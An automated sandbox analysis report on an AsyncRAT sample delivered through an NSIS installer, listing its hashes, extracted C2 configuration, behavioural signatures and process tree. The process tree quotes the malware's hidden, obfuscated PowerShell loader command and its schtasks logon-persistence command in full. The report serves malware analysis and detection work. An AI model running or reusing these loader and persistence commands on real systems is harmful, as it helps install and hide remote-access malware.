Analysis
- max time kernel: 142s
- max time network: 140s
- platform: windows10-2004_x64
- resource: win10v2004-20240802-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 04/09/2024, 01:35
Static task
- static1
Behavioral tasks
- behavioral1: sample 37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe, resource win7-20240729-en
- behavioral2: sample 37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe, resource win10v2004-20240802-en
- behavioral3: sample $PLUGINSDIR/BgImage.dll, resource win7-20240903-en
- behavioral4: sample $PLUGINSDIR/BgImage.dll, resource win10v2004-20240802-en
- behavioral5: sample $PLUGINSDIR/nsDialogs.dll, resource win7-20240708-en
- behavioral6: sample $PLUGINSDIR/nsDialogs.dll, resource win10v2004-20240802-en
- behavioral7: sample $PLUGINSDIR/nsExec.dll, resource win7-20240903-en
- behavioral8: sample $PLUGINSDIR/nsExec.dll, resource win10v2004-20240802-en
General
- Target: 37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe
- Size: 579KB
- MD5: 8eb6236d11b0463ae82eb268ccc1f7e9
- SHA1: 08e1140bb7dd86231b8dbbc686e894cfe1d1c7b0
- SHA256: 37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01
- SHA512: d07bf2ec8ca8a57475b1d03214dea1b5c2f300962618d8fde5d987d94c749a0282cb639d6162d79ba10010c05f3df22b7e5d1036cb91bfdd1475198f82fc1af5
- SSDEEP: 12288:sCn4AyHnseftJpS/mErsKah4dNTTdAPCDbWhwP8wEV:/nEnseftbYmtX4pTywP8R
Malware Config
Extracted
- Family: asyncrat
- Version: 0.5.8
- Botnet: Default
- C2: fresh01.ddns.net:2256
- Mutex: waVkxgc3A4Ar
- delay: 3
- install: true
- install_file: logs.exe
- install_folder: %AppData%
Signatures
Command and Scripting Interpreter: PowerShell (1 TTPs, 4 IoCs)
Runs PowerShell with the display window hidden.
- PID 5012 powershell.exe
- PID 3912 powershell.exe
- PID 4388 powershell.exe
- PID 4304 powershell.exe
Checks computer location settings (2 TTPs, 3 IoCs)
Looks up the country code configured in the registry, likely a geofence.
- Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation (Landingspunkternes.exe)
- Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation (Landingspunkternes.exe)
- Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation (Landingspunkternes.exe)
Executes dropped EXE (3 IoCs)
- PID 2896 logs.exe
- PID 5024 logs.exe
- PID 4268 logs.exe
Loads dropped DLL (14 IoCs)
- PID 5080 37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe
- PID 5080 37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe
- PID 5080 37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe
- PID 5080 37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe
- PID 1620 Landingspunkternes.exe
- PID 2896 logs.exe
- PID 2896 logs.exe
- PID 2680 Landingspunkternes.exe
- PID 5024 logs.exe
- PID 5024 logs.exe
- PID 4276 Landingspunkternes.exe
- PID 4268 logs.exe
- PID 4268 logs.exe
- PID 1424 Landingspunkternes.exe
Suspicious use of NtCreateThreadExHideFromDebugger (3 IoCs)
- PID 1620 Landingspunkternes.exe
- PID 2680 Landingspunkternes.exe
- PID 4276 Landingspunkternes.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (7 IoCs)
- PID 4304 powershell.exe
- PID 1620 Landingspunkternes.exe
- PID 5012 powershell.exe
- PID 2680 Landingspunkternes.exe
- PID 3912 powershell.exe
- PID 4276 Landingspunkternes.exe
- PID 4388 powershell.exe
Suspicious use of SetThreadContext (4 IoCs)
- PID 4304 set thread context of 1620 (4304 powershell.exe, procid_target 95)
- PID 5012 set thread context of 2680 (5012 powershell.exe, procid_target 107)
- PID 3912 set thread context of 4276 (3912 powershell.exe, procid_target 117)
- PID 4388 set thread context of 1424 (4388 powershell.exe, procid_target 127)
Drops file in Program Files directory (8 IoCs)
- File opened for modification C:\Program Files (x86)\indflyvnings\Sparhawk128.Mod (logs.exe)
- File opened for modification C:\Program Files (x86)\astonied.ini (logs.exe)
- File opened for modification C:\Program Files (x86)\indflyvnings\Sparhawk128.Mod (logs.exe)
- File opened for modification C:\Program Files (x86)\astonied.ini (37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe)
- File opened for modification C:\Program Files (x86)\indflyvnings\Sparhawk128.Mod (37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe)
- File opened for modification C:\Program Files (x86)\astonied.ini (logs.exe)
- File opened for modification C:\Program Files (x86)\indflyvnings\Sparhawk128.Mod (logs.exe)
- File opened for modification C:\Program Files (x86)\astonied.ini (logs.exe)
Drops file in Windows directory (8 IoCs)
- File created C:\Windows\resources\sammentrkket\fatherlike.lnk (logs.exe)
- File opened for modification C:\Windows\Fonts\frasiger.ini (logs.exe)
- File created C:\Windows\resources\sammentrkket\fatherlike.lnk (logs.exe)
- File opened for modification C:\Windows\Fonts\frasiger.ini (37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe)
- File created C:\Windows\resources\sammentrkket\fatherlike.lnk (37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe)
- File opened for modification C:\Windows\Fonts\frasiger.ini (logs.exe)
- File created C:\Windows\resources\sammentrkket\fatherlike.lnk (logs.exe)
- File opened for modification C:\Windows\Fonts\frasiger.ini (logs.exe)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 24 IoCs)
Attempts to gather information about the system language of a victim host in order to infer its geographical location.
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language by each of the following processes (one IoC per entry):
- Landingspunkternes.exe
- schtasks.exe
- Landingspunkternes.exe
- powershell.exe
- cmd.exe
- timeout.exe
- timeout.exe
- 37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe
- schtasks.exe
- cmd.exe
- timeout.exe
- Landingspunkternes.exe
- logs.exe
- cmd.exe
- powershell.exe
- logs.exe
- powershell.exe
- cmd.exe
- schtasks.exe
- cmd.exe
- Landingspunkternes.exe
- cmd.exe
- logs.exe
- powershell.exe
NSIS installer (2 IoCs)
- resource behavioral2/files/0x000600000002270e-71.dat, yara_rule nsis_installer_1
- resource behavioral2/files/0x000600000002270e-71.dat, yara_rule nsis_installer_2
Delays execution with timeout.exe (3 IoCs)
- PID 1476 timeout.exe
- PID 3164 timeout.exe
- PID 452 timeout.exe
Scheduled Task/Job: Scheduled Task (1 TTPs, 3 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
- PID 4276 schtasks.exe
- PID 4848 schtasks.exe
- PID 1668 schtasks.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Suspicious behavior: MapViewOfSection (4 IoCs)
- PID 4304 powershell.exe
- PID 5012 powershell.exe
- PID 3912 powershell.exe
- PID 4388 powershell.exe
Suspicious use of AdjustPrivilegeToken (7 IoCs)
- Token: SeDebugPrivilege (PID 4304 powershell.exe)
- Token: SeDebugPrivilege (PID 1620 Landingspunkternes.exe)
- Token: SeDebugPrivilege (PID 5012 powershell.exe)
- Token: SeDebugPrivilege (PID 2680 Landingspunkternes.exe)
- Token: SeDebugPrivilege (PID 3912 powershell.exe)
- Token: SeDebugPrivilege (PID 4276 Landingspunkternes.exe)
- Token: SeDebugPrivilege (PID 4388 powershell.exe)
Suspicious use of WriteProcessMemory (64 IoCs)
Processes
Process tree (indentation shows parent/child depth; the depth number is the original tree level)
- [1] C:\Users\Admin\AppData\Local\Temp\37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe"
  PID: 5080
  Signatures: Loads dropped DLL; Drops file in Program Files directory; Drops file in Windows directory; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
  - [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -windowstyle hidden "$Rigsrevisorers=Get-Content 'C:\Users\Admin\AppData\Roaming\Watertown136\Brevskolen141\Receptiv147\Arbouriculture248.fra';$Cocculus=$Rigsrevisorers.SubString(9851,3);.$Cocculus($Rigsrevisorers)"
    PID: 4304
    Signatures: Command and Scripting Interpreter: PowerShell; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of SetThreadContext; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - [3] C:\Users\Admin\AppData\Local\Temp\Landingspunkternes.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Landingspunkternes.exe"
      PID: 1620
      Signatures: Checks computer location settings; Loads dropped DLL; Suspicious use of NtCreateThreadExHideFromDebugger; Suspicious use of NtSetInformationThreadHideFromDebugger; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - [4] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "logs" /tr '"C:\Users\Admin\AppData\Roaming\logs.exe"' & exit
        PID: 3116
        Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
        - [5] C:\Windows\SysWOW64\schtasks.exe
          Command line: schtasks /create /f /sc onlogon /rl highest /tn "logs" /tr '"C:\Users\Admin\AppData\Roaming\logs.exe"'
          PID: 4276
          Signatures: System Location Discovery: System Language Discovery; Scheduled Task/Job: Scheduled Task
      - [4] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4419.tmp.bat""
        PID: 1964
        Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
        - [5] C:\Windows\SysWOW64\timeout.exe
          Command line: timeout 3
          PID: 1476
          Signatures: System Location Discovery: System Language Discovery; Delays execution with timeout.exe
        - [5] C:\Users\Admin\AppData\Roaming\logs.exe
          Command line: "C:\Users\Admin\AppData\Roaming\logs.exe"
          PID: 2896
          Signatures: Executes dropped EXE; Loads dropped DLL; Drops file in Program Files directory; Drops file in Windows directory; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
          - [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell.exe" -windowstyle hidden "$Rigsrevisorers=Get-Content 'C:\Users\Admin\AppData\Roaming\Watertown136\Brevskolen141\Receptiv147\Arbouriculture248.fra';$Cocculus=$Rigsrevisorers.SubString(9851,3);.$Cocculus($Rigsrevisorers)"
            PID: 5012
            Signatures: Command and Scripting Interpreter: PowerShell; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of SetThreadContext; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
            - [7] C:\Users\Admin\AppData\Local\Temp\Landingspunkternes.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\Landingspunkternes.exe"
              PID: 2680
              Signatures: Checks computer location settings; Loads dropped DLL; Suspicious use of NtCreateThreadExHideFromDebugger; Suspicious use of NtSetInformationThreadHideFromDebugger; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
              - [8] C:\Windows\SysWOW64\cmd.exe
                Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "logs" /tr '"C:\Users\Admin\AppData\Roaming\logs.exe"' & exit
                PID: 2816
                Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
                - [9] C:\Windows\SysWOW64\schtasks.exe
                  Command line: schtasks /create /f /sc onlogon /rl highest /tn "logs" /tr '"C:\Users\Admin\AppData\Roaming\logs.exe"'
                  PID: 4848
                  Signatures: System Location Discovery: System Language Discovery; Scheduled Task/Job: Scheduled Task
              - [8] C:\Windows\SysWOW64\cmd.exe
                Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDC90.tmp.bat""
                PID: 3104
                Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
                - [9] C:\Windows\SysWOW64\timeout.exe
                  Command line: timeout 3
                  PID: 3164
                  Signatures: System Location Discovery: System Language Discovery; Delays execution with timeout.exe
                - [9] C:\Users\Admin\AppData\Roaming\logs.exe
                  Command line: "C:\Users\Admin\AppData\Roaming\logs.exe"
                  PID: 5024
                  Signatures: Executes dropped EXE; Loads dropped DLL; Drops file in Program Files directory; Drops file in Windows directory; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
                  - [10] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Command line: "powershell.exe" -windowstyle hidden "$Rigsrevisorers=Get-Content 'C:\Users\Admin\AppData\Roaming\Watertown136\Brevskolen141\Receptiv147\Arbouriculture248.fra';$Cocculus=$Rigsrevisorers.SubString(9851,3);.$Cocculus($Rigsrevisorers)"
                    PID: 3912
                    Signatures: Command and Scripting Interpreter: PowerShell; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of SetThreadContext; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
                    - [11] C:\Users\Admin\AppData\Local\Temp\Landingspunkternes.exe
                      Command line: "C:\Users\Admin\AppData\Local\Temp\Landingspunkternes.exe"
                      PID: 4276
                      Signatures: Checks computer location settings; Loads dropped DLL; Suspicious use of NtCreateThreadExHideFromDebugger; Suspicious use of NtSetInformationThreadHideFromDebugger; System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
                      - [12] C:\Windows\SysWOW64\cmd.exe
                        Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "logs" /tr '"C:\Users\Admin\AppData\Roaming\logs.exe"' & exit
                        PID: 4716
                        Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
                        - [13] C:\Windows\SysWOW64\schtasks.exe
                          Command line: schtasks /create /f /sc onlogon /rl highest /tn "logs" /tr '"C:\Users\Admin\AppData\Roaming\logs.exe"'
                          PID: 1668
                          Signatures: System Location Discovery: System Language Discovery; Scheduled Task/Job: Scheduled Task
                      - [12] C:\Windows\SysWOW64\cmd.exe
                        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp795C.tmp.bat""
                        PID: 536
                        Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
                        - [13] C:\Windows\SysWOW64\timeout.exe
                          Command line: timeout 3
                          PID: 452
                          Signatures: System Location Discovery: System Language Discovery; Delays execution with timeout.exe
                        - [13] C:\Users\Admin\AppData\Roaming\logs.exe
                          Command line: "C:\Users\Admin\AppData\Roaming\logs.exe"
                          PID: 4268
                          Signatures: Executes dropped EXE; Loads dropped DLL; Drops file in Program Files directory; Drops file in Windows directory; System Location Discovery: System Language Discovery
                          - [14] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Command line: "powershell.exe" -windowstyle hidden "$Rigsrevisorers=Get-Content 'C:\Users\Admin\AppData\Roaming\Watertown136\Brevskolen141\Receptiv147\Arbouriculture248.fra';$Cocculus=$Rigsrevisorers.SubString(9851,3);.$Cocculus($Rigsrevisorers)"
                            PID: 4388
                            Signatures: Command and Scripting Interpreter: PowerShell; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of SetThreadContext; System Location Discovery: System Language Discovery; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken
                            - [15] C:\Users\Admin\AppData\Local\Temp\Landingspunkternes.exe
                              Command line: "C:\Users\Admin\AppData\Local\Temp\Landingspunkternes.exe"
                              PID: 1424
                              Signatures: Loads dropped DLL; System Location Discovery: System Language Discovery